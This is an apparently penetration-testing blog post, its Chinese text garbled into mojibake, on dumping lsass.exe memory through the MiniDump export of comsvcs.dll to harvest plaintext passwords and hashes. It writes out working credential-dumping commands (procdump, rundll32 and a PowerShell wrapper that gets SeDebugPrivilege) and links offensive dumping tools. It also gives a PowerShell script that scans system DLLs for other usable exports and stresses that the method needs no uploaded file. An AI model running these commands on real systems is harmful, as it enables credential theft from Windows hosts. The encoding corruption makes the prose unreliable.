I"Ê,<h2 id="0x00-å‰è¨€">0x00 å‰è¨€</h2>
<hr />

<p>æœ€è¿‘å­¦ä¹ äº†odzhanæ–‡ç« ä¸­ä»‹ç»çš„ä¸€ä¸ªæŠ€å·§ï¼Œä½¿ç”¨C:\windows\system32\comsvcs.dllçš„å¯¼å‡ºå‡½æ•°MiniDumpèƒ½å¤ŸdumpæŒ‡å®šè¿›ç¨‹çš„å†…å­˜æ–‡ä»¶ã€‚</p>

<p>æ–‡ç« åœ°å€ï¼š</p>

<p>https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/</p>

<p>æœ¬æ–‡å°†è¦ç»“åˆè‡ªå·±çš„ç»éªŒï¼Œè¡¥å……åœ¨æµ‹è¯•è¿‡ç¨‹ä¸­éœ€è¦æ³¨æ„çš„åœ°æ–¹ï¼Œæ‰©å±•æ–¹æ³•ï¼Œåˆ†æåˆ©ç”¨æ€è·¯ã€‚ç¼–å†™powershellè„šæœ¬ï¼Œå®ç°è‡ªåŠ¨åŒ–æ‰«æç³»ç»Ÿç›®å½•ä¸‹æ‰€æœ‰dllçš„å¯¼å‡ºå‡½æ•°ï¼ŒæŸ¥çœ‹æ˜¯å¦å­˜åœ¨å…¶ä»–å¯ç”¨çš„dllï¼Œä»‹ç»è„šæœ¬å®ç°çš„ç»†èŠ‚ã€‚</p>

<h2 id="0x01-ç®€ä»‹">0x01 ç®€ä»‹</h2>
<hr />

<p>æœ¬æ–‡å°†è¦ä»‹ç»ä»¥ä¸‹å†…å®¹ï¼š</p>

<ul>
  <li>dumpæŒ‡å®šè¿›ç¨‹å†…å­˜æ–‡ä»¶çš„å¸¸ç”¨æ–¹æ³•</li>
  <li>ä½¿ç”¨comsvcs.dllå®ç°dumpæŒ‡å®šè¿›ç¨‹å†…å­˜æ–‡ä»¶çš„æ–¹æ³•</li>
  <li>ç¼–å†™è„šæœ¬å®ç°è‡ªåŠ¨åŒ–æ‰«ædllçš„å¯¼å‡ºå‡½æ•°</li>
  <li>åˆ©ç”¨åˆ†æ</li>
</ul>

<h2 id="0x02-dumpæŒ‡å®šè¿›ç¨‹å†…å­˜æ–‡ä»¶çš„å¸¸ç”¨æ–¹æ³•">0x02 dumpæŒ‡å®šè¿›ç¨‹å†…å­˜æ–‡ä»¶çš„å¸¸ç”¨æ–¹æ³•</h2>
<hr />

<p>åœ¨æ¸—é€æµ‹è¯•ä¸­ï¼Œæœ€å¸¸ç”¨çš„æ–¹æ³•æ˜¯é€šè¿‡dumpè¿›ç¨‹lsass.exeï¼Œä»ä¸­è·å¾—æ˜æ–‡å£ä»¤å’Œhash</p>

<p>åœ¨åŸç†ä¸Šéƒ½æ˜¯ä½¿ç”¨API MiniDumpWriteDumpï¼Œå‚è€ƒèµ„æ–™ï¼š</p>

<p>https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump</p>

<p>å¸¸ç”¨çš„å®ç°æ–¹æ³•å¦‚ä¸‹ï¼š</p>

<h3 id="1procdump">1.procdump</h3>

<p>å‚æ•°å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>procdump.exe -accepteula -ma lsass.exe lsass.dmp
</code></pre></div></div>

<h3 id="2cå®ç°">2.c++å®ç°</h3>

<p>https://github.com/killswitch-GUI/minidump-lib</p>

<h3 id="3powershellå®ç°">3.powershellå®ç°</h3>

<p>https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1</p>

<h3 id="4cå®ç°">4.c#å®ç°</h3>

<p>https://github.com/GhostPack/SharpDump</p>

<h2 id="0x03-ä½¿ç”¨comsvcsdllå®ç°dumpæŒ‡å®šè¿›ç¨‹å†…å­˜æ–‡ä»¶çš„æ–¹æ³•">0x03 ä½¿ç”¨comsvcs.dllå®ç°dumpæŒ‡å®šè¿›ç¨‹å†…å­˜æ–‡ä»¶çš„æ–¹æ³•</h2>
<hr />

<p>odzhanåœ¨æ–‡ä¸­ç»™å‡ºäº†ä¸‰ç§æ–¹æ³•</p>

<h3 id="1é€šè¿‡rundll32">1.é€šè¿‡rundll32</h3>

<p>ç¤ºä¾‹å‚æ•°å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>rundll32 C:\windows\system32\comsvcs.dll, MiniDump 808 C:\test\lsass.dmp full
</code></pre></div></div>

<p>ç¤ºä¾‹ä¸­lsass.exeçš„pidä¸º808</p>

<p><strong>æ³¨ï¼š</strong></p>

<p>æ­¤å¤„éœ€è¦æ³¨æ„æƒé™çš„é—®é¢˜ï¼Œåœ¨dumpæŒ‡å®šè¿›ç¨‹å†…å­˜æ–‡ä»¶æ—¶ï¼Œéœ€è¦å¼€å¯SeDebugPrivilegeæƒé™</p>

<p>ç®¡ç†å‘˜æƒé™çš„cmdä¸‹ï¼Œé»˜è®¤æ”¯æŒSeDebugPrivilegeæƒé™ï¼Œä½†æ˜¯çŠ¶æ€ä¸ºDisabledï¼Œå¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2019-9-2/2-1.png" alt="Alt text" /></p>

<p>æ‰€ä»¥è¯´ï¼Œç›´æ¥åœ¨cmdä¸‹æ‰§è¡Œrundll32çš„å‘½ä»¤å°è¯•dumpæŒ‡å®šè¿›ç¨‹å†…å­˜æ–‡ä»¶æ—¶ï¼Œç”±äºæ— æ³•å¼€å¯SeDebugPrivilegeæƒé™ï¼Œæ‰€ä»¥ä¼šå¤±è´¥</p>

<p>è¿™é‡Œç»™å‡ºæˆ‘çš„ä¸€ä¸ªè§£å†³æ–¹æ³•ï¼š</p>

<p>ç®¡ç†å‘˜æƒé™çš„powershellä¸‹ï¼Œé»˜è®¤æ”¯æŒSeDebugPrivilegeæƒé™ï¼Œå¹¶ä¸”çŠ¶æ€ä¸ºEnabledï¼Œå¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2019-9-2/2-2.png" alt="Alt text" /></p>

<p>æ‰€ä»¥ï¼Œè¿™é‡Œå¯ä»¥é€šè¿‡powershellæ‰§è¡Œrundll32çš„å‘½ä»¤å®ç°ï¼Œç¤ºä¾‹å‘½ä»¤å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>powershell -c "rundll32 C:\windows\system32\comsvcs.dll, MiniDump 808 C:\test\lsass.dmp full"
</code></pre></div></div>

<h3 id="2é€šè¿‡vbså®ç°">2.é€šè¿‡vbså®ç°</h3>

<p>åŸæ–‡æä¾›äº†å®Œæ•´çš„å®ç°ä»£ç </p>

<p>æ‰§è¡Œçš„å‚æ•°å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cscript 1.vbs lsass.exe
</code></pre></div></div>

<p>vbsè„šæœ¬é¦–å…ˆå¼€å¯SeDebugPrivilegeæƒé™ï¼Œæ¥ç€æ‰§è¡Œrundll32çš„å‘½ä»¤ï¼Œæµ‹è¯•æˆåŠŸ</p>

<h3 id="3é€šè¿‡cå®ç°">3.é€šè¿‡cå®ç°</h3>

<p>åŸæ–‡æä¾›äº†å®Œæ•´çš„å®ç°ä»£ç </p>

<p>ä»£ç å…ˆå¼€å¯SeDebugPrivilegeæƒé™ï¼Œå†è°ƒç”¨comsvcs.dllçš„å¯¼å‡ºå‡½æ•°MiniDumpWï¼Œæµ‹è¯•æˆåŠŸ</p>

<h2 id="0x04-ç¼–å†™è„šæœ¬å®ç°è‡ªåŠ¨åŒ–æ‰«ædllçš„å¯¼å‡ºå‡½æ•°">0x04 ç¼–å†™è„šæœ¬å®ç°è‡ªåŠ¨åŒ–æ‰«ædllçš„å¯¼å‡ºå‡½æ•°</h2>
<hr />

<p>å­¦ä¹ å®Œodzhançš„æ–‡ç« ä»¥åï¼Œæˆ‘äº§ç”Ÿäº†ä¸€ä¸ªç–‘é—®ï¼š</p>

<p>Windowsç³»ç»Ÿç›®å½•ä¸‹æ˜¯å¦å­˜åœ¨å…¶ä»–å¯ç”¨çš„dllï¼Ÿ</p>

<p>äºæ˜¯ï¼Œæˆ‘å°è¯•é€šè¿‡è„šæœ¬å¯¹ç³»ç»Ÿç›®å½•ä¸‹æ‰€æœ‰dllçš„å¯¼å‡ºå‡½æ•°è¿›è¡Œç­›é€‰ï¼ŒæŸ¥çœ‹æ˜¯å¦åŒ…å«å¯¼å‡ºå‡½æ•°MiniDumpW</p>

<p>è„šæœ¬å®ç°ä¸Šéœ€è¦è€ƒè™‘ä»¥ä¸‹ä¸¤ä¸ªé—®é¢˜ï¼š</p>

<h3 id="1éå†æŒ‡å®šç›®å½•è·å–æ‰€æœ‰dll">1.éå†æŒ‡å®šç›®å½•ï¼Œè·å–æ‰€æœ‰dll</h3>

<p>éå†è·¯å¾„C:\windowsçš„æµ‹è¯•ä»£ç å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ForEach($file in (Get-ChildItem -recurse -Filter "*.dll" -Path 'C:\windows'  -ErrorAction SilentlyContinue )) 
{
    $file.PSPath
}
</code></pre></div></div>

<p>ç”±äºå­˜åœ¨å¤šçº§ç›®å½•ï¼Œè¿™é‡Œéœ€è¦è·å¾—dllçš„ç»å¯¹è·¯å¾„ï¼Œè€Œ$file.PSPathçš„æ ¼å¼ä¸º<code class="language-plaintext highlighter-rouge">Microsoft.PowerShell.Core\FileSystem::C:\windows\RtlExUpd.dll</code>ï¼Œå®é™…è·¯å¾„éœ€è¦å»é™¤å‰ç¼€</p>

<p>ä¼˜åŒ–åçš„ä»£ç å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ForEach($file in (Get-ChildItem -recurse -Filter "*.dll" -Path 'C:\windows'  -ErrorAction SilentlyContinue )) 
{
    $file.PSPath.Substring($file.PSPath.IndexOf(":")+2)
}
</code></pre></div></div>

<h3 id="2è·å¾—æŒ‡å®šdllçš„å¯¼å‡ºå‡½æ•°">2.è·å¾—æŒ‡å®šdllçš„å¯¼å‡ºå‡½æ•°</h3>

<p>è¿™é‡Œå¯ä»¥å‚è€ƒhttps://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Get-Exports.ps1</p>

<p>åœ¨æ­¤åŸºç¡€ä¸Šè¿›è¡Œä¼˜åŒ–ï¼Œå®ç°æ•´ä¸ªæµç¨‹çš„è‡ªåŠ¨åŒ–å¤„ç†</p>

<p>å®Œæ•´ä»£ç å·²ä¸Šä¼ è‡³GitHubï¼Œåœ°å€å¦‚ä¸‹ï¼š</p>

<p>https://github.com/3gstudent/Homework-of-Powershell/blob/master/Get-AllExports.ps1</p>

<p>å¯¹C:\Windowsè¿›è¡Œç­›é€‰çš„ä»£ç å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Import-Module ./Get-AllExports.ps1
$Path = 'C:\Windows'
ForEach($file in (Get-ChildItem -recurse -Filter "*.dll" -Path $Path  -ErrorAction SilentlyContinue )) 
{
#   $file.PSPath.Substring($file.PSPath.IndexOf(":")+2)
    Get-Exports -DllPath $file.PSPath.Substring($file.PSPath.IndexOf(":")+2)
}
</code></pre></div></div>

<p>æµ‹è¯•ç³»ç»Ÿï¼šWin7x64</p>

<p>éƒ¨åˆ†ç»“æœï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[+] C:\windows\system32\comsvcs.dll--&gt;MiniDumpW
[+] C:\windows\system32\dbghelp.dll--&gt;MiniDumpReadDumpStream
[+] C:\windows\system32\dbghelp.dll--&gt;MiniDumpWriteDump
[+] C:\Windows\Syswow64\comsvcs.dll--&gt;MiniDumpW
[+] C:\Windows\Syswow64\dbghelp.dll--&gt;MiniDumpReadDumpStream
[+] C:\Windows\Syswow64\dbghelp.dll--&gt;MiniDumpWriteDump
[+] C:\Windows\Microsoft.NET\Framework\v2.0.50727\SOS.dll--&gt;MinidumpMode
[+] C:\Windows\Microsoft.NET\Framework\v2.0.50727\SOS.dll--&gt;Minidumpmode
[+] C:\Windows\Microsoft.NET\Framework\v2.0.50727\SOS.dll--&gt;minidumpmode
[+] C:\Windows\Microsoft.NET\Framework\v4.0.30319\SOS.dll--&gt;MinidumpMode
[+] C:\Windows\Microsoft.NET\Framework\v4.0.30319\SOS.dll--&gt;Minidumpmode
[+] C:\Windows\Microsoft.NET\Framework\v4.0.30319\SOS.dll--&gt;minidumpmode
[+] C:\Windows\Microsoft.NET\Framework64\v2.0.50727\SOS.dll--&gt;MinidumpMode
[+] C:\Windows\Microsoft.NET\Framework64\v2.0.50727\SOS.dll--&gt;Minidumpmode
[+] C:\Windows\Microsoft.NET\Framework64\v2.0.50727\SOS.dll--&gt;minidumpmode
[+] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SOS.dll--&gt;MinidumpMode
[+] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SOS.dll--&gt;Minidumpmode
[+] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SOS.dll--&gt;minidumpmode
[+] C:\Windows\winsxs\amd64_microsoft-windows-c..fe-catsrvut-comsvcs_31bf3856ad364e35_6.1.7600.16385_none_ceb756d4b98f01a4\comsvcs.dll--&gt;MiniDumpW
[+] C:\Windows\winsxs\amd64_microsoft-windows-imageanalysis_31bf3856ad364e35_6.1.7601.17514_none_a6821d2940c2bcdc\dbghelp.dll--&gt;MiniDumpReadDumpStream
[+] C:\Windows\winsxs\amd64_microsoft-windows-imageanalysis_31bf3856ad364e35_6.1.7601.17514_none_a6821d2940c2bcdc\dbghelp.dll--&gt;MiniDumpWriteDump
[+] C:\Windows\winsxs\x86_microsoft-windows-c..fe-catsrvut-comsvcs_31bf3856ad364e35_6.1.7600.16385_none_7298bb510131906e\comsvcs.dll--&gt;MiniDumpW
[+] C:\Windows\winsxs\x86_microsoft-windows-imageanalysis_31bf3856ad364e35_6.1.7601.17514_none_4a6381a588654ba6\dbghelp.dll--&gt;MiniDumpReadDumpStream
[+] C:\Windows\winsxs\x86_microsoft-windows-imageanalysis_31bf3856ad364e35_6.1.7601.17514_none_4a6381a588654ba6\dbghelp.dll--&gt;MiniDumpWriteDump
</code></pre></div></div>

<p>æµ‹è¯•ç»“æœå¦‚ä¸‹ï¼š</p>

<h4 id="1å¯¹äºä¸åŒç»“æ„çš„è¿›ç¨‹å¯ç”¨çš„dllä¸åŒ">1.å¯¹äºä¸åŒç»“æ„çš„è¿›ç¨‹ï¼Œå¯ç”¨çš„dllä¸åŒ</h4>

<p>å¯¹äº32ä½çš„è¿›ç¨‹ï¼Œå¯ä»¥ä½¿ç”¨32ä½å’Œ64ä½çš„dllï¼š</p>

<ul>
  <li>C:\windows\system32\comsvcs.dll</li>
  <li>C:\Windows\Syswow64\comsvcs.dll</li>
  <li>C:\Windows\winsxs\amd64_microsoft-windows-c..fe-catsrvut-comsvcs_31bf3856ad364e35_6.1.7600.16385_none_ceb756d4b98f01a4\comsvcs.dll</li>
  <li>C:\Windows\winsxs\x86_microsoft-windows-c..fe-catsrvut-comsvcs_31bf3856ad364e35_6.1.7600.16385_none_7298bb510131906e\comsvcs.dll</li>
</ul>

<p>å¯¹äº64ä½çš„è¿›ç¨‹ï¼Œå¯ä»¥ä½¿ç”¨64ä½çš„dllï¼š</p>

<ul>
  <li>C:\windows\system32\comsvcs.dll</li>
  <li>C:\Windows\winsxs\amd64_microsoft-windows-c..fe-catsrvut-comsvcs_31bf3856ad364e35_6.1.7600.16385_none_ceb756d4b98f01a4\comsvcs.dll</li>
</ul>

<p>æ— æ³•ä½¿ç”¨32ä½çš„dllï¼š</p>

<ul>
  <li>C:\Windows\Syswow64\comsvcs.dll</li>
  <li>C:\Windows\winsxs\x86_microsoft-windows-c..fe-catsrvut-comsvcs_31bf3856ad364e35_6.1.7600.16385_none_7298bb510131906e\comsvcs.dll</li>
</ul>

<h4 id="2dbghelpdllå¯¹åº”api-minidumpwritedump">2.dbghelp.dllå¯¹åº”API MiniDumpWriteDump</h4>

<h4 id="3sosdllä¸­çš„å¯¼å‡ºå‡½æ•°minidumpmode">3.SOS.dllä¸­çš„å¯¼å‡ºå‡½æ•°minidumpmode</h4>

<p>ç”¨äºé˜²æ­¢åœ¨ä½¿ç”¨minidumpæ—¶æ‰§è¡Œéå®‰å…¨å‘½ä»¤ã€‚0è¡¨ç¤ºç¦ç”¨è¿™ä¸ªåŠŸèƒ½ï¼Œ1è¡¨ç¤ºå¯ç”¨ã€‚é»˜è®¤ä¸º0</p>

<h2 id="0x05-åˆ©ç”¨åˆ†æ">0x05 åˆ©ç”¨åˆ†æ</h2>
<hr />

<p>å¦‚æœæƒ³è¦dumpæŒ‡å®šè¿›ç¨‹çš„å†…å­˜æ–‡ä»¶ï¼Œå¯ä»¥ä½¿ç”¨æ–°çš„æ–¹æ³•ï¼Œç¤ºä¾‹å‘½ä»¤å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>powershell -c "rundll32 C:\windows\system32\comsvcs.dll, MiniDump 808 C:\test\lsass.dmp full"
</code></pre></div></div>

<p>å…¶ä¸­comsvcs.dllå¯ä»¥æ›¿æ¢ä¸ºä»¥ä¸‹dllï¼š</p>

<ul>
  <li>C:\Windows\Syswow64\comsvcs.dll</li>
  <li>C:\Windows\winsxs\amd64_microsoft-windows-c..fe-catsrvut-comsvcs_31bf3856ad364e35_6.1.7600.16385_none_ceb756d4b98f01a4\comsvcs.dll</li>
  <li>C:\Windows\winsxs\x86_microsoft-windows-c..fe-catsrvut-comsvcs_31bf3856ad364e35_6.1.7600.16385_none_7298bb510131906e\comsvcs.dll</li>
</ul>

<p>è¿™ç§æ–¹æ³•çš„ä¼˜ç‚¹æ˜¯ä¸éœ€è¦ä¸Šä¼ æ–‡ä»¶ï¼Œä½¿ç”¨ç³»ç»Ÿé»˜è®¤åŒ…å«çš„dllå°±å¯ä»¥å®ç°</p>

<h2 id="0x06-å°ç»“">0x06 å°ç»“</h2>
<hr />

<p>æœ¬æ–‡åœ¨odzhanæ–‡ç« çš„åŸºç¡€ä¸Šï¼Œè¡¥å……åœ¨æµ‹è¯•è¿‡ç¨‹ä¸­éœ€è¦æ³¨æ„çš„åœ°æ–¹ï¼Œæ‰©å±•æ–¹æ³•ï¼Œåˆ†æåˆ©ç”¨æ€è·¯ã€‚ç¼–å†™powershellè„šæœ¬ï¼Œå®ç°è‡ªåŠ¨åŒ–æ‰«æç³»ç»Ÿç›®å½•ä¸‹æ‰€æœ‰dllçš„å¯¼å‡ºå‡½æ•°ã€‚</p>

<hr />

<p><a href="https://github.com/3gstudent/feedback/issues/new">LEAVE A REPLY</a></p>

:ET